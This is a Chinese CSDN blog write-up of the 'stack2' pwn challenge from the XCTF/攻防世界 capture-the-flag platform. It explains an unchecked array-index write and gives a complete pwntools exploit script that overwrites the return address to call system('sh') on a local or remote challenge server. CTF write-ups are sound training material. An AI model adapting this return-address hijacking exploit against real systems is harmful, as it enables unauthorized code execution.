《攻防世界》stack2逻辑漏洞题

最新推荐文章于 2024-06-17 23:23:26 发布
最新推荐文章于 2024-06-17 23:23:26 发布
阅读量3.6k 收藏 1
点赞数
分类专栏: pwn题目 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/csdn546229768/article/details/121350487
版权

到了进阶题目越来越好玩了,发现解出来一道题有解数学那味了

嗯,拿到题目一看逻辑题,做题刚打完比赛(第一次)被逆向和pwn的逻辑题给整怕了,这次遇到这种题目,我选择硬刚!

首先读懂题目的内在逻辑,并关注常见的pwn漏洞,首先一步步分析

在这里插入图片描述

这里有个循环100次接收输入,全局的看了下都是在对buf操作,先标志一手,但是这里无法产生溢出,那么看下面

在这里插入图片描述

首先看到for里面初始化j = v5 ,那么这个j也就是我们可控的标记一下,然后就是死循环,每次循环后调用一次printf

select1就是显示所有值、select2添加值,select3修改值、select4打印所有累加值、select其他就是完美避开所有判断break跳出所有循环

嗯,分析之后大概的试了下程序,突破口在于这个for循环中的j,可以看到select1中就是打印出我想要看到的长度数值

在这里插入图片描述

那么第一次输入的时候就可以直接尝试输入一个很大的值,然后select1看看打印的值,

num  = 0x70+0x4 + (0x4 *4)
sla('\n',str(num))
#输入的100个数
for i in range(0,100):
 sl('1')
sl('1')#显示数据是否正确

在这里插入图片描述

因为我输入的长度是大于缓冲区的所以打印出了多余的,那么再来看看栈空间是否数值匹配

在这里插入图片描述

果然没错刚好对应栈空间数据,那么我们回到ida中,因为select2对数据进行判断我们不能添加成功99个之后的数,但是select3却可以,所以我们只要找到数组中对应的索引对齐单个修改就可以修改成我们想要的地址了,为了后面的方便我提取了个方法

def send(index,data):
 sl('3') #逐个进行修改ret地址
 sl(str(index))
 sl(str(ord(data)))

最后将栈空间对应的索引,和要修改的拼接地址传入进来,ok!payload如下:

backdoor = 0x804859B  #这个好像用不了
data = p32(backdoor)
send(num,data[0:-3])
send(num+1,data[1:-2])
send(num+2,data[2:-1])
send(num+3,data[3:])

因为程序提供了后门函数,所以最后直接运行程序,本地跑通了,但是远程却失败了,报了个找不到bash的错误,嗯!,没关系,刚好程序提供了System函数和sh字符(需要解析),那么自己搭个桥就是了

syst_addr = 0x8048450
bin_sh = 0x08048980 +7 #刚好取到sh(这是个小技巧,可以记下笔记)

然后再按之前的方法在后门进行拼接进去我们的参数,嗯,但是程序依旧报错,我还gdb看了栈空间,确实进入了system函数,但是没多久就奔溃了,然后我想到了之前做64位的栈空间对齐问题,果断试着添加一个返回地址已填充栈空间所需数据,最终payload,可以正常拿到sh

from pwn import *
context (log_level = 'debug' ,bits=32 ,os = 'linux' ,arch = 'i386' ,terminal = ['tmux' , 'splitw', '-h'])

local = 1
binary_name = "stack2"
ip = "111.200.241.244"
port = 64664

if local:
        p = process(["./" + binary_name])
        e = ELF("./" + binary_name)
else:
        p = remote(ip, port)
        e = ELF("./" + binary_name)

def z(a=''):
        if local:
                gdb.attach(p, a)
                if a == '':
                        raw_input()
        else:
                pass

ru = lambda x: p.recvuntil(x)
rc = lambda x: p.recv(x)
sl = lambda x: p.sendline(x)
sd = lambda x: p.send(x)
sla = lambda delim, data: p.sendlineafter(delim, data)

backdoor = 0x804859B  #这个好像用不了
syst_addr = 0x8048450
main_addr = 0x080485D0

z('b *0x80488EB')

num  = 0x70+0x4 + (0x4 *4)
bin_sh = 0x08048980 +7 #刚好取到sh
sla('\n',str(num))

#输入的100个数
for i in range(0,100):
 sl('1')
sl('1')#显示数据是否正确
data = p32(syst_addr)
data_sh = p32(bin_sh)
data_main = p32(main_addr)
success('backdoor addr -> 0x%s',data)
success('backdoor addr -> %d',ord(data[3:]))
success('backdoor addr -> %d',ord(data[2:-1]))
success('backdoor addr -> %d',ord(data[1:-2]))
success('backdoor addr -> %d',ord(data[0:-3]))

def send(index,data):
 sl('3') #逐个进行修改ret地址
 sl(str(index))
 sl(str(ord(data)))

send(num,data[0:-3])
send(num+1,data[1:-2])
send(num+2,data[2:-1])
send(num+3,data[3:])

send(num+4,data_main[0:-3])
send(num+5,data_main[1:-2])
send(num+6,data_main[2:-1])
send(num+7,data_main[3:])

send(num+8,data_sh[0:-3])
send(num+9,data_sh[1:-2])
send(num+10,data_sh[2:-1])
send(num+11,data_sh[3:])
sl('5')

p.interactive()

做完这题看wp后发现大佬都是一点点代码就跑出来了,和我的代码有点不一样,但思路是一样的,我这个是完全按照我做题思路一步步写出来的,所以没有经过简化,也算是一套思路过程吧,现在做题每次做到了最后获取shell的时候,都会有个栈数据填充问题,不知道是不是该考虑下我的环境问题,每次手动调栈数据好费时间啊

HNHuangJingYu
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界PWN进阶区(stack2)
BurYiA的博客
01-26 873
stack2 哈,我又回来了 这个呢,基本rop,但有几个点比较难弄… 比如:偏移不好求,环境中没有/bin/bash等… 言归正传,我们先看一下基本信息 32位程序,有NX,有Canary。 运行可以发现它可以创建一个存储数字的数组,创建好以后我们可以对其中的数据进行一些基本的操作,ok,接下来开始硬刚IDA 通过观察main函数伪代码我们可以发现上图这个位置有点小问 这个时对数据进行...
ndk-stack调试 cocos2d-x
01-20
ndk-stack 调试 cocos2d-x ndk-stack 是一个强大的命令行调试工具,用于调试 Native 代码,especially for Android 平台的.so 库文件。下面我们来详细了解 ndk-stack 在 cocos2d-x 中的应用。 什么是 ndk-stack? ...
攻防世界pwn——stack2
qq_62076255的博客
12-18 573
攻防世界pwn——stack2做记录
Buffer_Overflows_b.rar_c/C++_stack smashing_漏洞_缓冲区溢出
07-14
顶尖高手讲的缓冲区溢出漏洞原理及实例代码分析,C,汇编。千万别错过,很难得的资料哟
Apress - Pro MERN Stack, 2nd.2019.epub
06-07
Apress - Pro MERN Stack, 2nd.2019.epub Apress - Pro MERN Stack, 2nd.2019.epub
CTFshow-PWN-前置基础(pwn17)
Welcome To Myon'Blog !
04-17 1324
注:0xAuLL 中的 uLL 表示这是一个无符号长长整型(unsigned long long)的常量,sleep(0x1BF52u)中的u表示无符号整型(unsigned)。在 UNIX 系统中,0 表示标准输入(STDIN),1 表示标准输出(STDOUT),2 表示标准错误(STDERR)。cat /ctf* 或者 /;db 是汇编语言中的伪指令(pseudo-instruction),用于声明字节(byte)类型的数据。dest 是一个标签(label),它是程序中一个位置的名称或者符号。
攻防世界高手进阶区——stack2
weixin_62675330的博客
02-24 903
攻防世界高手进阶区——stack2 看题目啥都没有 一,分析文件 checksec 发现居然存在栈溢出保护,这是以前做没看到过的,可能会有新的知识点。 运行文件 貌似是一个输入数字计算平均值的程序。 ida打开 unsigned int m; // [esp+34h] [ebp-74h] char v13[100]; // [esp+38h] [ebp-70h] unsigned int v14; // [esp+9Ch] [ebp-Ch] v14 = __readgs
攻防世界----bug
qq_44418229的博客
08-03 1029
攻防世界----bug 知识点1:逻辑漏洞--垂直越权 知识点2:文件上传---利用JavaScript执行php代码
攻防世界pwn--stack2
L0g1c的博客
10-31 489
查看保护机制 (有栈不可执行NX,有canary保护) 用IDA分析(查看伪代码) int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // eax unsigned int v5; // [esp+18h] [ebp-90h] unsigned int v6; // [esp+1Ch] [ebp-8Ch] int v7; // [esp+20h] [ebp-88h] unsigned
攻防世界WEB进阶之bug
harry_c的博客
09-08 6279
攻防世界WEB进阶之bug1、描述2、实操3、答案 1、描述 难度系数: 2星 题目来源: RCTF-2015 题目描述:暂无 题目场景: 点击获取在线场景 题目附件: 暂无 首先打开场景发现是一个登录页面,而且有注册界面,而且还有修改密码的选项,首先注册号账号后查看是否登陆进去能找到漏洞,未果。 打开修改密码界面,尝试是否有逻辑漏洞,果然,将admin账号的密码成功修改为harry。 2、实操 ...
攻防世界——web高手进阶区
热门推荐
小锤队长的博客
10-01 2万+
目录 1,cat (Django,cURL漏洞) 2,ics-05(XCTF 4th-CyberEarth)(文件包含 + preg_replace函数漏洞) 3,ics-06(爆破id) 4,lottery(.git文件泄露) 5,NewsCenter(sql注入) 6,mfv(.git文件泄露 + php审计+ 命令执行) 7,Training-WWW-Robots(robo...
stack-2&3_栈_数据结构_后缀表达式_Stack2_stack2_
10-03
利用栈结构完成后缀表达式求值及中缀表达式求值。
VMPWN的入门级别题目详解(二)
蚁景网安学院
07-28 349
这道应该算是虚拟机保护的一个变种,是一个解释器类型的程序,何为解释器?解释器是一种计算机程序,用于解释和执行源代码。解释器可以理解源代码中的语法和语义,并将其转换为计算机可以执行的机器语言。与编译器不同,解释器不会将源代码转换为机器语言,而是直接执行源代码。
强网杯2022 pwn解析——yakacmp
CoLin的pwn小屋
08-07 1003
强网杯2022 pwn解析——yakacmp
攻防世界PWN之shell
seaaseesa的博客
11-22 1402
shell 首先,检查一下程序的保护机制 然后,我们用IDA分析 存在栈溢出漏洞 我们先运行程序,发现可以直接输命令 然而,其他命令都不可用,需要登录成功才能用 我们看看登录的逻辑 程序从creds.txt文件中一行一行的读取,取第一个冒号后面的内容为用户名,取第二个冒号后面的内容为密码 只要我们输入的用户名和密码存在于那个文件,就登录成功,然后就能执行shel...
攻防世界 Pwn Recho
MrTreebook的博客
12-18 641
攻防世界 Pwn Recho1.题目下载地址2.checksec3.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 3.IDA分析 可以看到这个while是死循环 所以要学会使用pwntools的shutdown功能来退出循环 但是循环退出之后就不能再进入了 接下来要看一下漏洞在哪 这个题目有个明显后门,在data段发现有flag。可以将它read到bss段中,再通过write输出出来 在gdb动态调试时,分析alarm,发现有 有syscall系统调用 漏洞利用思路如下:
攻防世界bug
xiaoqi199915的博客
06-02 1485
尝试弱口令和万能密码 首先你应该登录 进行注册 但是自己没有注册成功 登录自己的账号密码 并未发现什么 需要管理员权限进行登录 进行忘记密码进行秘密 burp 进行抓包 账号名改成admin 密码是自己注册的密码进行发包 登陆成功 admin权限 点manage发现出现IP IP问 进行X-Forwarded-For :127.0.0.1 进行审查源码 发现index.php?module=filemanage&do=??? 那么do后面能是什么呢 猜测upload 写一个php代码 改为.
攻防世界(web高手进阶区)——21~31
weixin_43610673的博客
04-11 2980
FlatScience 点开的页面中的链接都是下载pdf文件的,都是英文论文什么的,先不管 测试/.git/,回显404,但有robots.txt 两个登录界面,猜测flag应该是登录admin.php拿到,通过对login.php进行注入得到密码。 login.php源码注释有提示 访问/login.php?debug,得到源码 是个sqlite的数据库,密码通过sha1加密还加了sa...
VirtualBox 7.0.18 安装在D盘文件下,会提示目录不安全等信息,不让安装
最新发布
qq_43684686的博客
06-17 353
VirtualBox 7.0.18 安装在D盘文件下,会提示目录不安全等信息,不让安装。重新执行安装程安装到 d:\a-vm。在D盘新建一个文件夹a-vm,
wddx_stack_destroy 函数释放后重用漏洞
03-25
A:我理解你在询问一个漏洞,即在使用 wddx_stack_destroy 函数进行释放后,可能会发生重用漏洞的情况。这个漏洞存在于 PHP 代码中,可以使攻击者能够利用已经释放的内存空间进行执行任意代码。具体来说,当 wddx_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值